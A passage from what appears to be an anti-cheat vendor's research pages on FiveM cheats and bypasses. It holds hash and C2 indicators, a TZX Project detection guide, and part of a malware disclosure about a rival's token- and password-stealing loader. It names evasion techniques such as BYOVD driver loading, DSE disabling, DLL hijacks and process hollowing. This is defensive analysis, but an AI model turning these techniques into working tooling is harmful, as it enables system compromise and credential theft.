PcaSvc: 0x581000. The payload is visible inside the FiveM game process in System Informer. Covers Journal tool, Prefetch parser, and injection evidence.\ \ FiveMCheat DetectionProcess MasqueradeSystem Informer\ \ Clubhouse AC Research·Jun 2, 2026·8 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/anydesk-fivem-detection) [Cheat Detection\ \ High\ \ ### FiveM External Cheat: Detection & Forensic Artifacts\ \ Forensic breakdown of an unnamed FiveM external cheat identified through hash fingerprinting. SHA-256: 49C275CB04134AFC50816121930786B2D7843F055C13BAF52626CAAE4C79C321. SHA-1: D4E117077CC5D26DF848626EB7F69D9176A82230. Operates externally to the game process — detection relies on hash confirmation and PcaSvc/DPS execution evidence rather than in-process strings.\ \ FiveMExternal CheatCheat DetectionHash IOC\ \ Clubhouse AC Research·Jun 2, 2026·6 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/fivem-external-cheat-detection) [Cheat Detection\ \ High\ \ ### Aqua TriggerBot: Detection & Forensic Artifacts\ \ Forensic breakdown of the Aqua TriggerBot, distributed disguised as ReShade\_Setup\_6.6.1.exe to appear as a legitimate graphics post-processing installer. SHA-256: 841757e9118e0c09c3693c7d60e142535d576b558ae373d8d808501f2b3d59c9. DPS: 2025/10/16. PcaSvc: 0x80000. The loader UI is notably low-effort ('AI slop'). Covers DPS/PcaSvc identification and ReShade masquerade technique.\ \ FiveMTriggerBotReShade MasqueradePcaSvc\ \ Clubhouse AC Research·Jun 2, 2026·7 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/aqua-triggerbot-detection) [Bypass Detection\ \ High\ \ ### Revenge Bypass: EFI-Drive DLL Masquerade & keyauth.win Detection\ \ Forensic breakdown of Revenge Bypass, which hides its payload on a hidden EFI system partition disguised as desktop.ini and mimics ReShade's installer name. The active bypass DLL is mapped into svchost.exe with keyauth.win authentication in DNS and lsass. Covers BAM parser, Journal Trace showing the EFI desktop.ini path, and System Informer svchost memory strings.\ \ FiveMBypass DetectionEFI PartitionDLL Masquerade\ \ Clubhouse AC Research·Jun 2, 2026·9 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/revenge-bypass-detection) [Bypass Detection\ \ High\ \ ### Star.xyz Bypass: Win32 EXE with keyauth.win LSASS Strings\ \ Forensic breakdown of Star.xyz Bypass (4.54 MB Win32 EXE). SHA-256: ce5f6779fdd9c32e5ad6c9dcbc77c3c80a520d1488e9c026f997790cf7ea47b4. SHA-1: 9f926aac866275bb93925a9294e53dbc839e274a. keyauth.win domain observed in both DNS cache and LSASS memory strings. Artifacts include LastActivityView execution records, Journal Trace DLL entries, Everything tool discovery, and VirusTotal detections.\ \ FiveMBypass Detectionkeyauth.winLSASS\ \ Clubhouse AC Research·Jun 2, 2026·9 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/star-xyz-bypass-detection) [Bypass Detection\ \ Critical\ \ ### Spotless Bypass: Full Paid Kernel Reversal, C2 Infrastructure & TZX Connection\ \ Paid engagement: we reversed the Spotless FiveM bypass suite in full using Ghidra on Kali Linux after pulling all 16 files from an unprotected file server (93.127.141.9:8080) — IP found hardcoded in a client-provided DLL. Covers neguin.sys kernel driver (VolCache device, ETW hooks, ObCallbacks, manual DLL map via IOCTL 0x222004), MB.dll C2 auth, Discord token theft, process hollowing into dllhost.exe, AES-CBC decryption key recovered from crypt.exe global initializer, bufa.dll BYOVD loader, v3.dll cheat engine (compiled May 29 2026), fulano.dll targeting 16 FiveM build processes, bananacomleite.exe with RSA TLS pinning, and confirmed TZX infrastructure crossover via api.tzproject.com.\ \ FiveMKernel DriverPaid EngagementTZX Connection\ \ Clubhouse AC Research·Jun 5, 2026·25 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/spotless-bypass-detection) [Bypass Detection\ \ High\ \ ### Purge Bypass: Emoji-Named DLL, Discord Bot C2 & VBScript Downloader\ \ Forensic breakdown of Purge Bypass, which drops c👎.dll (emoji character in filename) and spawns cmd.exe opening System Informer. SHA-256: 1c6f0c6aa01e65b9bf17ea1d4d7de0a6382b97dad27541eccc608e5e645d40fa. Persists via Registry HKCU\\Printers\\DevModePerUser, drops imgui\_log.txt, injects via localhost Discord bot, and downloads a second stage via obfuscated VBScript. C2: scrapingant domain.\ \ FiveMBypass DetectionEmoji DLLRegistry Persistence\ \ Clubhouse AC Research·Jun 2, 2026·10 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/purge-bypass-detection) [Bypass Detection\ \ High\ \ ### Old Club44 Bypass: SteamSetup Masquerade with 'Clean Traces' Button\ \ Forensic breakdown of Old Club44 Bypass, distributed as SteamSetup.exe and WinRARSetup.exe. SHA-256: f1d96aca4ddb6b317e43e2cc599ce69f32a2c41a1c1adf94312da48269536fc2. 16/70 VirusTotal detections. The loader UI features a 'Clean Traces' button — confirming awareness of forensic investigation. C2: eauth.us.to. Covers hash identification, VT analysis, and C2 artifact recovery.\ \ FiveMBypass DetectionSteam MasqueradeAnti-Forensic Feature\ \ Clubhouse AC Research·Jun 2, 2026·8 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/club44-bypass-detection) [Bypass Detection\ \ High\ \ ### Superior Bypass: 7-Zip Masquerade with keyauth.win C2\ \ Forensic breakdown of Superior Bypass, distributed as C:\\Program Files\\7-zip\\7zCon.exe to blend into a legitimate 7-Zip installation. SHA-256: 3ab3d87217c6b22f986e43a79e058b202e609f2571c370ba9668ee89ae638b4e. DIE strings analysis reveals 'Clear/Clean/Cheat/Cheat Engine' keywords. C2: keyauth.win. Covers path anomaly detection, string extraction, and keyauth infrastructure identification.\ \ FiveMBypass Detection7-Zip Masqueradekeyauth.win\ \ Clubhouse AC Research·Jun 2, 2026·8 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/superior-bypass-detection) [Bypass Detection\ \ High\ \ ### Wexize Bypass: BAM Registry & Prefetch Execution Trail\ \ Forensic breakdown of Wexize Revamp.exe bypass. SHA-1: 404209b5e427ddb7ab14c6bd77044d13922f1db4. PcaSVC entry at 0xac424d0. Despite anti-forensic claims, execution artifacts persist across BAM registry, Prefetch files readable via WinPrefetchView, and LastActivityView timeline. Covers each artifact source with detection steps.\ \ FiveMBypass DetectionBAM RegistryPrefetch\ \ Clubhouse AC Research·Jun 2, 2026·8 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/wexize-bypass-detection) [Bypass Detection\ \ High\ \ ### XRC Bypass: PowerShell IEX In-Memory Loader with Future-Dated DPS\ \ Forensic breakdown of XRC Bypass, which uses PowerShell IEX (Invoke-Expression) to load its payload entirely in memory, leaving Event Viewer PowerShell event 800. SHA-256: 9d8038d5f03503704ee237ed72b8683e0261a254951ad0ce717842a27672b2ff. Anomalous DPS timestamp of 2038/07/16. PcaSVC: 0x11a000. Artifacts include Destemido Cleaner.exe companion, CRDOWNLOAD file in Journal Trace, and keyauth.win C2.\ \ FiveMBypass DetectionPowerShell IEXFuture Timestamp\ \ Clubhouse AC Research·Jun 2, 2026·9 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/xrc-bypass-detection) [Bypass Detection\ \ High\ \ ### Secure-Bzpass: Process Lasso DLL Hijack with Alt+F12 Injection\ \ Forensic breakdown of secure-bzpass. SHA-256: 6ce7c98b384dbe444a916e7e6580288549eca501315114916c1ee1908b5afff8. Hijacks profapi.dll inside Process Lasso's installation directory and uses Alt+F12 hotkey to trigger injection. Although the bypass destructs and unloads on exit, the DLL file remains on disk — a persistent artifact. Covers DLL path anomaly, hotkey-triggered injection mechanics, and persistence identification.\ \ FiveMBypass DetectionDLL HijackProcess Lasso\ \ Clubhouse AC Research·Jun 2, 2026·9 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/secure-bzpass-detection) [Bypass Detection\ \ High\ \ ### Xytrus Bypass: Unity Game DLL Masquerade Injecting into Explorer\ \ Forensic breakdown of Xytrus Bypass, which plants UnityCrashHandler64.exe and a modified UnityPlayer.dll inside the Crab Game installation directory to appear as legitimate Unity engine files. The bypass then injects into explorer.exe for persistence. Detection via LastActivityView execution records, DLL path anomaly (Unity binary outside game folder context), and explorer.exe module inspection.\ \ FiveMBypass DetectionUnity MasqueradeExplorer Injection\ \ Clubhouse AC Research·Jun 2, 2026·8 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/xytrus-bypass-detection) [Bypass Detection\ \ High\ \ ### Ninez Hider: PowerShell EncodedCommand Downloading from Catbox.moe\ \ Forensic breakdown of Ninez Hider, which executes an encoded PowerShell command (-encodedCommand) to download its second-stage payload from files.catbox.moe — a public file-hosting service. The encoded command and download URL survive in ConsoleHost\_history.txt. Covers history file recovery, base64 command decoding, and network IOC identification.\ \ FiveMBypass DetectionPowerShellEncodedCommand\ \ Clubhouse AC Research·Jun 2, 2026·8 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/ninez-hider-detection) [Bypass Detection\ \ High\ \ ### Shitty Bypass: Kernel Driver (info.sys) Dropped via certutil to System32\ \ Forensic breakdown of 'Shitty Bypass', which drops a kernel driver named info.sys (SHA-256: 2bd3e29013ca7115eac06b9c6993789fd577d572365b3590f26f07188dddd1ea) to C:\\Windows\\System32 using certutil.exe as a living-off-the-land downloader. A cum.sys variant also observed. DiagTrack service artifacts preserve the full certutil command-line including the download URL. Covers Diagtrack artifact recovery and driver file identification.\ \ FiveMBypass DetectionKernel Drivercertutil LOLBAS\ \ Clubhouse AC Research·Jun 2, 2026·9 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/shitty-bypass-detection) [Bypass Detection\ \ High\ \ ### Aqua EFI Bypass: Modified EFI Bootloader Running Before Windows\ \ Forensic breakdown of the Aqua EFI Bypass — a modified bootx64.efi bootloader that executes before the Windows kernel loads, providing pre-OS anti-cheat circumvention. SHA-256: 91d9db5fbf3c89b0df5d674f0e367afd3ac9e45ff1c13040ee2279cf3314cbd5. SHA-1: d8fca4d3fa670c6d54fc274a0625cd4bad2016ab. Covers EFI partition inspection methodology, bootloader hash verification, and detection via Secure Boot log analysis.\ \ FiveMBypass DetectionEFI BootloaderPre-OS Bypass\ \ Clubhouse AC Research·Jun 2, 2026·10 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/aqua-efi-bypass-detection) [Bypass Detection\ \ High\ \ ### No Trace Bypass: mycomput.dll Planted in Computer Management (18 MB)\ \ Forensic breakdown of No Trace Bypass, which plants mycomput.dll inside Computer Management (Computerverwaltung). The bypass DLL weighs ~18,000 KB versus the legitimate 124 KB original — an immediate size-based detection. SHA-256: f07de2eb82878d89e6851b5c6434638049467f1c343bcacc287037f621e5a494. Injected via Win+X then F7 keyboard shortcut. Covers size anomaly detection, DLL path verification, and shortcut-triggered injection.\ \ FiveMBypass Detectionmycomput.dllDLL Size Anomaly\ \ Clubhouse AC Research·Jun 2, 2026·9 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/no-trace-bypass-detection) [Bypass Detection\ \ High\ \ ### Farbenbomber Bypass: PcaSVC & Prefetch Execution Artifacts\ \ Forensic breakdown of Farbenbomber.exe bypass. SHA-256: af10429bea0dff14ad9c452d01b6950cd648a8c6b8f91b9fe9a2388bef8b860b. DPS timestamp: 2025/10/15. PcaSVC: 0x494000. Despite anti-forensic design intent, execution artifacts persist in Prefetch files, Journal Trace, and System Informer process records — each source cross-corroborating execution time and context.\ \ FiveMBypass DetectionPcaSVCPrefetch\ \ Clubhouse AC Research·Jun 2, 2026·8 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/farbenbomber-bypass-detection) [Bypass Detection\ \ High\ \ ### Wizard Bypass: DecoyLoader.pdb YARA Rule & Future-Dated DPS\ \ Forensic breakdown of Wizard Bypass (doumpa.exe). SHA-256: 9a868d89f0344ab7f1300300a0725244c5748d73151a604cea932f5717984978. Anomalous DPS timestamp of 2026/01/01 (New Year's Day — deliberate). PcaSVC: 0x1b29000. Retains the PDB path string 'DecoyLoader.pdb' in its PE debug directory, enabling a high-confidence YARA rule. Covers timestamp manipulation detection and PDB artifact analysis.\ \ FiveMBypass DetectionYARAPDB Artifact\ \ Clubhouse AC Research·Jun 2, 2026·9 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/wizard-bypass-detection) [Bypass Detection\ \ High\ \ ### Notepad Bypass: fa817dc1 Full Reversal — ROL-XOR Cipher, CPU Affinity & WTS Cross-Session Messaging\ \ Deep static analysis of a FiveM bypass masquerading as notepad.exe (SHA-256: b61907b9…f8d39a18, 4.90 MB, timestamped 2023-09-27). Six hollowed virtual PE sections, single .tiko payload at 7.88 entropy, ROL-XOR decryption key 0x32063cae shared with ApateonDecoy/Wizard — same packer family. Export table abuse: 3,100-byte encrypted blob with 7.94 entropy as the sole export 'name'. NtQuerySystemInformation direct ntdll anti-debug, window station check, CPU affinity mask fingerprinting (3 affinity APIs), WTSSendMessageW cross-session messaging, and timing evasion. Full 16-function stub map, YARA rules for exact and family-level detection, screenshare methodology.\ \ FiveMBypass DetectionYARACustom Packer\ \ Clubhouse AC Research·Jun 6, 2026·18 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/notepad-bypass-detection) [Bypass Detection\ \ High\ \ ### Sulution Software Bypass: Three Build Variants with March 2026 DPS Timestamps\ \ Forensic breakdown of Sulution Software Bypass, which shipped at least three distinct builds in rapid succession (DPS: 2026/03/18 and 2026/03/20). SHA-256 hashes: 9afb3f4b…, df699dca…, acd31242…. The close timestamp clustering indicates active development and iterative evasion attempts. Covers multi-variant hash tracking, DPS cross-comparison, and artifact overlap analysis across builds.\ \ FiveMBypass DetectionMulti-BuildDPS Timestamp\ \ Clubhouse AC Research·Jun 2, 2026·9 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/sulution-software-detection) [Bypass Detection\ \ High\ \ ### XYZ Corp Bypass: Randomised Executable Name with xyzcorporation.xyz C2\ \ Forensic breakdown of XYZ Corp Bypass (ear6tkyel9rv.exe — randomly generated filename). SHA-256: 6cb47876cd00d14ba9c5a85f9b2ccbc91e34c13190feb1c099310f6969bd35c0. DPS: 2026/03/06. Extracted from C:\\Users\\Administrator\\AppData\\Local. C2 domain: xyzcorporation.xyz. The randomised executable name is a weak obfuscation — DPS timestamps and the C2 domain provide reliable cross-source confirmation.\ \ FiveMBypass DetectionRandom FilenameC2 Domain\ \ Clubhouse AC Research·Jun 2, 2026·8 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/xyz-corp-bypass-detection) [Bypass Detection\ \ High\ \ ### Stainless Bypass: telephon.cpl with RTCore64 BYOVD Driver\ \ Forensic breakdown of Stainless Bypass (telephon.cpl). SHA-256: 9104158b8ee2f545697504a368be7fd264cadac2ed38ecd80a8dcc9f42e27097. Loads the RTCore64.sys vulnerable driver (a known BYOVD target) to disable kernel callbacks. YARA rule matches on both stainless.pdb PDB path and RTCore64 driver filesystem paths embedded in the binary. Covers BYOVD chain reconstruction and YARA detection methodology.\ \ FiveMBypass DetectionBYOVDRTCore64\ \ Clubhouse AC Research·Jun 2, 2026·10 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/stainless-bypass-detection) [Bypass Detection\ \ High\ \ ### Genesis Bypass: pwahelper.exe with Genesis-Rework Hook PDB\ \ Forensic breakdown of Genesis Bypass (pwahelper.exe). SHA-256: 93780adffbda11803c3a6f40730403d09495dd85877700503894f48c1e36a958. DPS: 2026/03/21. PcaSVC: 0x79000. Retains the PDB path 'Genesis-Rework hook.pdb' in its debug directory — the developer forgot to strip debug symbols, providing a high-confidence YARA detection string. Covers PDB artifact analysis, DPS/PcaSvc corroboration, and YARA rule construction.\ \ FiveMBypass DetectionPDB ArtifactYARA\ \ Clubhouse AC Research·Jun 2, 2026·8 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/genesis-bypass-detection) [Bypass Detection\ \ High\ \ ### Titan Bypass: Thoroughly Underwhelming Anti-Forensics That Leave Everything\ \ Forensic breakdown of Titan Bypass — a bypass product that, despite marketing itself on anti-forensic capability, leaves artifacts in Event Viewer, Journal Trace, LastActivityView, and plaintext Notepad files sitting on the desktop. A masterclass in false confidence. Detection requires nothing exotic: standard five-minute screenshare procedure surfaces the full execution timeline without specialist tooling.\ \ FiveMBypass DetectionEvent ViewerJournal Trace\ \ Clubhouse AC Research·Jun 2, 2026·7 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/titan-bypass-detection) [Bypass Detection\ \ High\ \ ### Apateon Bypass: kokaizanh.exe with March 2026 DPS Timestamp\ \ Forensic breakdown of Apateon Bypass (kokaizanh.exe). SHA-256: f9ad0e39cebb900f9864a1bfc4101f5d8562d9ba92e4f5bbb8b8d62daae74713. DPS: 2026/03/18. PcaSVC: 0x287a000. The randomised executable name is a superficial obfuscation — DPS and PcaSvc execution timestamps provide definitive confirmation regardless of filename changes or post-execution cleanup attempts.\ \ FiveMBypass DetectionDPS TimestampPcaSVC\ \ Clubhouse AC Research·Jun 2, 2026·8 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/apateon-bypass-detection) [Bypass Detection\ \ High\ \ ### Vanish Bypass: Spotify.exe Masquerade with Journal Trace Evidence\ \ Forensic breakdown of Vanish Bypass, distributed as Spotify.exe to blend into a player's music application. SHA-256: 039cb40286288bc9b661ad19efa2f45ca2c9818a02c14a44c59df44b9b5f7bfe. Despite the masquerade, Journal Trace records preserve the true file path and creation event. Covers the Spotify masquerade technique, Journal Trace recovery, and hash-based definitively identification against legitimate Spotify binaries.\ \ FiveMBypass DetectionSpotify MasqueradeJournal Trace\ \ Clubhouse AC Research·Jun 2, 2026·8 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/vanish-bypass-detection) [Bypass Detection\ \ High\ \ ### Sacred Bypass PWNED: Screenshot Storage Exposed & It's Just Windhawk\ \ PWNED: Sacred Bypass exposed an unauthenticated screenshot storage server at 46.202.140.112, leaking approximately 2,500 customer screenshots including personal desktop content, file listings, and sensitive information. Independent analysis reveals the 'bypass' is functionally Windhawk + Spotify running as Administrator — not a proprietary kernel solution. Full exposure and technical analysis.\ \ FiveMBypass DetectionPWNEDData Exposure\ \ Clubhouse AC Research·Jun 2, 2026·10 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/sacred-bypass-detection) [Bypass Detection\ \ High\ \ ### Club44 Decompiled: BSOD-Triggering System32 Deletion & Brazilian Dev Errors\ \ Full decompilation analysis of Club44, revealing catastrophically unsafe code that deletes System32 on error — triggering a BSOD. The binary strings include the infamous 'Falha NtCreateThreadEx' error message in Portuguese (the developer's native language), exposes a 'Club44-FiveM-External/1.0' User-Agent string hardcoded in HTTP requests, and injects into SystemSettingsBroker.exe. A monument to dangerous incompetence.\ \ FiveMBypass DetectionDecompiledBSOD Risk\ \ Clubhouse AC Research·Jun 2, 2026·11 min\ \ Published\ \ Read research](https://clubhouseac.shop/research/club44-decompiled-detection) ### Disclosure & responsible use Detection rules and forensic methodologies published here describe defensive techniques used by the Clubhouse AC scanner. Where research touches on third-party software vulnerabilities (driver-signing flaws, DMA board firmware, anti-forensic tooling), we follow coordinated disclosure with the affected vendor or maintainer before publishing operational detail. Notes marked disclosure pending are held back until that process completes. Material is published for defenders, server administrators, DFIR practitioners, and academic researchers. We will not provide weaponised samples, working exploit chains, or evasion guidance. To report a vulnerability in our scanner, contact security@clubhouseac.shop. --- # Clubhouse AC — Forensic PC Scanning for Game Servers English [Clubhouse AC](https://clubhouseac.shop/) Welcome Back Sign in to access the dashboard Continue with Discord Or continue with email Email Password Login Need an account? Sign up --- # Clubhouse AC — Forensic PC Scanning for Game Servers English [Clubhouse AC](https://clubhouseac.shop/) Welcome Back Sign in to access the dashboard Continue with Discord Or continue with email Email Password Login Need an account? Sign up --- # TZX Project FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished TZX Project FiveM cheat detection & forensic artifacts ====================================================== TZX Project is a FiveM-targeted cheat loader distributed under the name taskthow.exe. It shares C2 infrastructure with TZ Project, communicating with api.tzproject.com, but is a distinct binary with its own hash profile. Its most distinctive artifact is packages.json dropped into C:\\Windows\\System32\\ — a file not created by any legitimate Windows component. CR Clubhouse AC Research June 1, 2026 8 min read Summary * packages.json dropped into C:\\Windows\\System32\\ — the most distinctive and persistent artifact of TZX Project, not created by any legitimate Windows component. * Shares C2 domain api.tzproject.com with TZ Project but is a separate binary — distinguish by executable name (taskthow.exe vs firefox.exe). * C2 domain observed in DNS cache, LSASS memory, and FiveM\_GTAProcess.exe simultaneously. * DPS first-seen timestamp (2025-03-15 14:38:02) and PcaSVC entry survive independently of user-side cleanup. Overview -------- TZX Project is a commercially distributed FiveM cheat loader. Its primary executable is named taskthow.exe and weighs approximately 7.1 MB. It connects to api.tzproject.com — the same C2 domain used by TZ Project — for license validation and payload delivery. Despite sharing C2 infrastructure with TZ Project, TZX Project is an entirely separate binary with its own hash profile and distinct behavioral footprint. The two cheats should not be conflated: the executable name is the primary distinguishing factor during a process-list inspection. TZX Project's most unique artifact is a file named packages.json written directly into C:\\Windows\\System32\\, which is trivially located via a Journal Trace search and has no legitimate counterpart. Sample metadata (IOC) --------------------- The following file was recovered and added to the research corpus. All hash values are provided for cross-platform matching. taskthow.exe — file indicatorsIOC Name taskthow.exe Size 7,434,240 bytes (7.1 MB) SHA-256 e0669f468852c41db8d60323777b3226fcaf3ac64b9d07e35955de834ab2d2a0 SHA-1 fdaf1a8441f50f05f5174147ee47f1094fc6c2ef MD5 1935197a8b7a8b6bccb48eb9da254cd5 First seen 2025-03-15 14:38:02 UTC (DPS timestamp) PcaSVC 0xf19000 C2 domain api.tzproject.com / tzproject.com → Observed in: DNS cache, lsass.exe, FiveM\_GTAProcess.exe The DPS timestamp of 2025-03-15 14:38:02 is written by the Windows Program Compatibility Assistant service at first execution and cannot be cleared by the same cleanup routines that wipe Prefetch or browser history. Behavioral indicators --------------------- ### packages.json in System32 TZX Project drops a file named packages.json into C:\\Windows\\System32\\. This file is not created by any legitimate Windows component, application runtime, or Node.js installation at that path. It is visible in a Journal Trace search filtered for packages and will appear as a creation event under the System32 directory. This is the most distinctive and actionable artifact of TZX Project. Its presence in System32 is immediately anomalous and requires no additional context to flag during a screenshare. ### Shared C2 infrastructure with TZ Project TZX Project uses the same C2 domain (api.tzproject.com) as TZ Project but is a separate binary with different hashes. The two should not be confused during an investigation. Check the executable name: taskthow.exe is TZX Project, while firefox.exe is TZ Project. The same C2 domain appearing in DNS, LSASS, or the FiveM process does not on its own distinguish which variant is present — the process name and file hash are the definitive differentiators. Memory artifacts ---------------- During an active TZX Project session, the C2 domain api.tzproject.com appears across three independent artifact sources simultaneously: the system DNS cache, LSASS process memory, and the FiveM game process working set. ### DNS cache Running ipconfig /displaydns or inspecting the DNS section in System Informer will show api.tzproject.com as a recently resolved entry, confirming an outbound connection was made during the session. ### lsass.exe memory The C2 domain string appears in lsass.exe process memory as a residual artifact from injection or inter-process communication performed by the loader. This is consistent with behavior observed in TZ Project and other cheats sharing this C2 infrastructure. ### FiveM game process The C2 domain is also present within the FiveM\_GTAProcess.exe working set, confirming that TZX Project injects into or communicates directly with the game process. ### Prefetch record A Prefetch entry for taskthow.exe will appear in C:\\Windows\\Prefetch following execution. The Prefetch file records the full path of the executable, providing a persistent record of loader execution that survives basic cleanup attempts. Screenshare check guide ----------------------- Work through these steps in order. Step 1 is the fastest and most unique to TZX Project. Steps 2–7 cover memory, persistence, and cleanup-resistant artifacts. 1 ### packages.json Journal Trace * Open a Journal Trace tool and search for packages. * Look for a creation event under C:\\Windows\\System32\\packages.json. This file has no legitimate origin in that path and is TZX Project's most distinctive persistent artifact. * If the file still exists, navigate to System32 directly and confirm its presence. 2 ### DNS cache * Run ipconfig /displaydns or check System Informer's DNS section. * Search for api.tzproject.com. A cache hit confirms an outbound connection was made during the current or a recent session. 3 ### Process list — taskthow.exe * Open Task Manager or System Informer and look for any running instance of taskthow.exe. * If found, confirm the executable path. The binary is not associated with any legitimate Windows or third-party software component. 4 ### lsass.exe and FiveM process memory scan * If FiveM is currently running, perform a string scan in System Informer for tzproject.com. * Hits in lsass.exe or FiveM\_GTAProcess.exe confirm active C2 communication and injection. 5 ### DPS / PcaSVC timestamp * Use a DFIR tool to inspect PcaSVC and DPS log entries for taskthow.exe. * The DPS timestamp of 2025-03-15 14:38:02 corresponds to the known build. Any PcaSVC entry for taskthow.exe is definitive evidence of execution. 6 ### Browser and Discord * Check browser history and downloads for traffic to tzproject.com. * In Discord, check **User Settings → Authorized Apps** for any TZX Project or TZ Project related authorisation. 7 ### Prefetch — taskthow.exe * Check the Prefetch folder (C:\\Windows\\Prefetch) for a TASKTHOW.EXE-\*.pf entry. * A Prefetch entry for this filename is unambiguous — there is no legitimate process named taskthow.exe in any standard Windows or application installation. Detection summary ----------------- Artifact matrix — TZX Project / taskthow.exeSummary Artifact Survives cleanup? Check location ────────────────────────────────────────────────────────────────────────── PcaSVC / DPS timestamp Yes AppCompat / DPS log packages.json in System32 Yes C:\\Windows\\System32 journal trace Prefetch (taskthow.exe) Usually C:\\Windows\\Prefetch DNS cache (api.tzproject.com) Session-length ipconfig /displaydns C2 strings in lsass.exe Only while running Memory string scan C2 strings in FiveM process Only while running Memory string scan The most immediately actionable indicator is the **packages.json file in C:\\Windows\\System32**, located via Journal Trace. It persists after the cheat exits, requires no specialised tooling beyond a journal search, and has no legitimate counterpart. The DPS timestamp provides a reliable historical first-seen marker that cannot be cleared without registry editing. Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # ClubXJefe & Venacy — Full Reverse Engineering Disclosure · Clubhouse AC Executive Summary ----------------- **edputil.dll** (3.86 MB, PE32+ DLL) is ClubXJefe's upstream loader. It masquerades as Microsoft's Enterprise Data Protection Utility, installs as Windows service "DxpTaskHost", and carries **five embedded kernel-exploit drivers** (XOR 0x48 encoded). It steals Discord tokens from 11 client variants, browser passwords from 24 Chromium browsers via DPAPI, and Steam accounts — all exfiltrated over **unencrypted HTTP** to a hard-coded IP. **venacyexternal5m7.exe** (15.5 MB, PE32+ GUI EXE) is the Venacy reseller cheat binary sharing the same developer and codebase. It adds a D3D11 overlay with HLSL-powered wallhack shaders, 728 cheat feature keys, a bidirectional WebSocket screen relay that **bypasses HDCP and screen-capture protection**, and a white-label reseller system. ClubXJefe (operator: “Jefe”) is one of three known Venacy resellers. Both binaries permanently degrade the customer's system security by disabling Driver Signature Enforcement, HVCI, VBS, and the Vulnerable Driver Blocklist — **changes that persist across reboots**. The loader resolves NtShutdownSystem — a kernel API that forces immediate system shutdown — giving the operator a remote brick capability over every paying customer. The developer leaked their own identity through their binaries: Windows username vados (in 3D model asset paths), Portuguese profanity in the kernel driver PDB path (INJECTDESTRUCTSPORRATODA — “inject-destruct-fuck-everything”), and a font author handle punish. The operator country is Brazil, confirmed by MercadoPago payment processing, pt-BR frontend locale, and Portuguese user-facing strings. Background ---------- On June 24, 2026 a competing FiveM cheat vendor operating under the brand “ClubXJefe” published a 28-claim “analysis report” accusing our forensic scanner of being an infostealer. The report was generated by loading our scanner into IDA Pro and feeding the decompiler output to an LLM via an MCP bridge — a legitimate workflow for fast triage that is also famous for producing confident hallucinations. This page is two things: a point-by-point rebuttal of every claim in their report, and a complete reverse engineering disclosure of their own products — edputil.dll (the upstream ClubXJefe loader) and venacyexternal5m7.exe (the affiliated Venacy reseller binary). Both samples were provided by affected end users and analyzed in an isolated lab with no live C2 traffic. Method ------ Both binaries were analyzed using proprietary tooling in an isolated lab environment. Full disassembly, control-flow reconstruction, cross-reference analysis, and automated deobfuscation were performed against both samples. The upstream loader's 1,257 encrypted strings were bulk-recovered after defeating its custom cipher, exposing every C2 URL, API path, registry key, and internal log message in a single pass. The reseller binary required minimal deobfuscation — most of its operational strings are in plaintext. Both samples were provided by affected end users; no live C2 traffic was generated or intercepted during the analysis. Claim-by-claim rebuttal ----------------------- Every claim from their report, our verdict, and the evidence. Where a claim is technically true, we note that it was already disclosed — and contrast it with what their own product does. 1 Uses BYOVD (vulnerable signed driver) to gain kernel access True — already disclosed Yes. Our scanner loads one of two vendor-signed Microsoft-trusted drivers — iqvw64e.sys (Intel) as primary, gdrv.sys (GIGABYTE) as fallback — for the duration of a scan, uses it to briefly relax DSE long enough to load our own read-only inspection driver (ClubhouseACKernel.sys), then restores DSE. Fully disclosed in our Terms of Service. Unlike their product, ours does not embed 5 vulnerable drivers, does not disable Driver Signature Enforcement across reboots, and does not patch WdFilter.sys to blind Windows Defender. 2 Installs kernel callbacks (PsSetCreateProcessNotifyRoutineEx, etc.) False Those API names appear in the binary as detection labels — the scanner reports when something else registers those callbacks. Our driver registers zero kernel callbacks. The LLM they used to write their report saw the string and hallucinated the behavior. 3 Scans browser history for cheat-related domains True — already disclosed Yes. Bounded reads of browser anchor files for cheat-domain indicators. Standard anti-cheat behavior — FACEIT, BattlEye, EAC, and Vanguard all do this. The scan reads domain hits, not browsing history. 4 Takes desktop screenshots True — already disclosed Three screenshots (exe open, scan start, scan end) to catch secondary-monitor overlays. Documented in source, disclosed to operators. Their product streams continuous JPEG frames of the customer's entire desktop to their server via WebSocket — including DRM-protected windows — without any disclosure. 5 Collects hardware IDs (SMBIOS, disk serial, MAC) True — already disclosed Standard machine fingerprinting for ban enforcement. Their product collects 12 HWID components including Bluetooth radio MAC, router gateway MAC via ARP, TPM version, and Windows Product ID — far beyond what a license check needs — and sends it all over unencrypted HTTP. 6 Sends data to a remote server True — already disclosed Scan results go to the operator's dashboard over TLS with certificate validation. Their product sends stolen Discord tokens, browser credentials, and Steam accounts over bare HTTP to a hard-coded IP address. Every ISP on the path can read every byte. 7 Has RunOnce persistence (×3) False "RunOnce" appears three times as a detection label for persistence by other software. The scanner has no installed service, no scheduled task, no Run key. It is a single-shot executable that exits after the scan. Their product installs itself as a Windows service named 